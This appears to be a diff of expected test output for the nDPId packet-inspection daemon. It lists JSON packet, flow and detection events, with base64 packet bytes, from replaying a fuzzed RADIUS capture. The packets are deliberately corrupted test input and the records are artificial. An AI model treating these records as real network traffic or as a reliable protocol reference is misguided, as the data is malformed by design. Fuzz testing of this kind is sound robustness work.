01266{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":245,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997988607,"pkt":"AAAMB6xAABRP+4olAABFAALHITdAAP8RAAAKDEAexuIZNXIQBxQCswAAAYUCq1+INwexFZhfJQDfuQscp+waCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqhlATUwMzExNDgwMDczNjM4MDcyQHdsYW4QbW5jNDg2Lm1jYzMxMS5EZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAAGjEAAAAJASthdWRpdC1zZXNzae9uLWlkPTEwZmYxMGFjMDAwMDAwY2I2NGE4MjI1YiwgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABZU9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAAqyk7MPy+\/53EGG8G21R64AwIAIEnDCioaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyEgERVSpEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0Q0xhYhoJAADXyA8DMRoKAABXsBAETkpHEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaNQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbCUAIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQElQJdBGjY0wxqxPERz7qHjo="} 01252{"packet_event_id":1,"packet_event_name":"packet","packet_id":245,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997988607,"pkt":"AAAMB6xAABRP+4olAABFAALHITdAAP8RAAAKDEAexuIZNXIQBxQCswAAAYUCq1+INwexFZhfJQDfuQscp+waCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqhlATUwMzExNDgwMDczNjM4MDcyQHdsYW4QbW5jNDg2Lm1jYzMxMS5EZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAAGjEAAAAJASthdWRpdC1zZXNzae9uLWlkPTEwZmYxMGFjMDAwMDAwY2I2NGE4MjI1YiwgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABZU9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAAqyk7MPy+\/53EGG8G21R64AwIAIEnDCioaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyEgERVSpEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0Q0xhYhoJAADXyA8DMRoKAABXsBAETkpHEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaNQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbCUAIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQElQJdBGjY0wxqxPERz7qHjo="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":245,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":0,"global_ts_msec":1528997989240} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":245,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":0,"global_ts_msec":1528997989240}
00724{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":246,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997988607,"pkt":"ABRP+4rqcNuYVcUnCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00710{"packet_event_id":1,"packet_event_name":"packet","packet_id":246,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997988607,"pkt":"ABRP+4rqcNuYVcUnCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":246,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997989461} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":246,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997989461}
01319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1528997997929,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":691,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":691,"pkt_l4_len":657,"thread_ts_msec":1528997997929,"pkt":"AAAMB6xAABRP+4rqCABFAAKlIThAAP8RAAAKDEAexuIZNXIQBxUCkQAABIYCiWTbrkYoE6dP3NRell25+W4aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzkBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWYRQAQP6AAAAAAAAAAAAAAAAAAAAgDlZaV0MyVGVzdExhYhoMAAA3YwEGAAAAAiwgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0PQYAAAATGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2I2NGE4MjI1Yi0GAAAAAUAGAAAADEEGAAAABlEENTY3BlsiqG0aFAAAV8gHDlZaV0MyVEMkdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExdHMC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUaAAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QoBgAVAAEfE2YwLTc5LTYwLWQxLTdkLTM3HiUlAC1hNy00Jaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1528997997929,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":691,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":691,"pkt_l4_len":657,"thread_ts_msec":1528997997929,"pkt":"AAAMB6xAABRP+4rqCABFAAKlIThAAP8RAAAKDEAexuIZNXIQBxUCkQAABIYCiWTbrkYoE6dP3NRell25+W4aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzkBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWYRQAQP6AAAAAAAAAAAAAAAAAAAAgDlZaV0MyVGVzdExhYhoMAAA3YwEGAAAAAiwgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0PQYAAAATGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2I2NGE4MjI1Yi0GAAAAAUAGAAAADEEGAAAABlEENTY3BlsiqG0aFAAAV8gHDlZaV0MyVEMkdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExdHMC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUaAAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QoBgAVAAEfE2YwLTc5LTYwLWQxLTdkLTM3HiUlAC1hNy00Jaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1528997998006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528997998006,"pkt":"ABRP+4rqcNuYVcUnCABFAACF2NZAAPwRe0\/G4hk1CgxAHgcVchAAcWngBYYAafOBk\/MbbTEmOF2SETjhcxsBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0"} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1528997998006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528997998006,"pkt":"ABRP+4rqcNuYVcUnCABFAACF2NZAAPwRe0\/G4hk1CgxAHgcVchAAcWngBYYAafOBk\/MbbTEmOF2SETjhcxsBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0"}
00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -348,8 +348,8 @@
01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1528998257171,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998257171,"pkt":"AAAMB6xAABRP+4rqCABFAALbtPNAAP8RAAAKDEAexuIZPnIQBxQCxwAAAZQCv\/QjF2fWlNBdxlblaWkTeyMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1NwZbIqlxATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1YWE5MjI1YiwgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2bzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAlAEZjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGmwAAFfIEAROShoRAABXyE0LTHluZGh1cnN0GgwAAFfIEgYAAAjJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNjEaDAAAOCERBgAAAEIaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCFMFzQwLjgwNDg4Mk4tN3kuxzAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS4SWykyhQ3NEVyrk907GZpA=="} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1528998257171,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998257171,"pkt":"AAAMB6xAABRP+4rqCABFAALbtPNAAP8RAAAKDEAexuIZPnIQBxQCxwAAAZQCv\/QjF2fWlNBdxlblaWkTeyMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1NwZbIqlxATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1YWE5MjI1YiwgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2bzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAlAEZjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGmwAAFfIEAROShoRAABXyE0LTHluZGh1cnN0GgwAAFfIEgYAAAjJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNjEaDAAAOCERBgAAAEIaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCFMFzQwLjgwNDg4Mk4tN3kuxzAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS4SWykyhQ3NEVyrk907GZpA=="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1528998257238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998257238,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC51AAPwRSGDG4hk+CgxAHgcUchAAkfysC5QAiW3tOcJvsUMExQ3khIQf5JsBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MAI6NWYvMjM4Tw4BAAAMFwwAAAwBf\/xQEttbuyUYSqflHrLDivPrVrc="} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1528998257238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998257238,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC51AAPwRSGDG4hk+CgxAHgcUchAAkfysC5QAiW3tOcJvsUMExQ3khIQf5JsBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MAI6NWYvMjM4Tw4BAAAMFwwAAAwBf\/xQEttbuyUYSqflHrLDivPrVrc="}
01233{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998257238,"pkt":"AAAMB6xAABRP+4rqCABFAAKrtPRAZP8RAAAKLEAexuIZPnIQBxQClwAAAZUCj2QnnzQfo5ejlXtjb\/umlWwaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1NwZbIqlxATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNib4OUAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTEwOlZlcml6b25XaTZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998257238,"pkt":"AAAMB6xAABRP+4rqCABFAAKrtPRAZP8RAAAKLEAexuIZPnIQBxQClwAAAZUCj2QnnzQfo5ejlXtjb\/umlWwaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1NwZbIqlxATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNib4OUAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTEwOlZlcml6b25XaTZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":663,"global_ts_msec":1528998257392} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":663,"global_ts_msec":1528998257392}
00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1528998257456,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528998257456,"pkt":"ABRP+4rqcNuYVcUnCABFAADAC6FAAPwRSEHG4hk+CgxAHgcUchAArH\/HA5UApDEA20uf1YbOtjZ3cBjhL8UBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjczExLjNncHBuZXR3b3JrLm9yZywwNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4EiIzMjc2NCBTdWJzY3JpYmVyIG53dCBwcm92aXNpb25lZE8HBAEABwBQEiTxEJAlgr8Mmnu4S7XiSkM="} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1528998257456,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528998257456,"pkt":"ABRP+4rqcNuYVcUnCABFAADAC6FAAPwRSEHG4hk+CgxAHgcUchAArH\/HA5UApDEA20uf1YbOtjZ3cBjhL8UBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjczExLjNncHBuZXR3b3JrLm9yZywwNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4EiIzMjc2NCBTdWJzY3JpYmVyIG53dCBwcm92aXNpb25lZE8HBAEABwBQEiTxEJAlgr8Mmnu4S7XiSkM=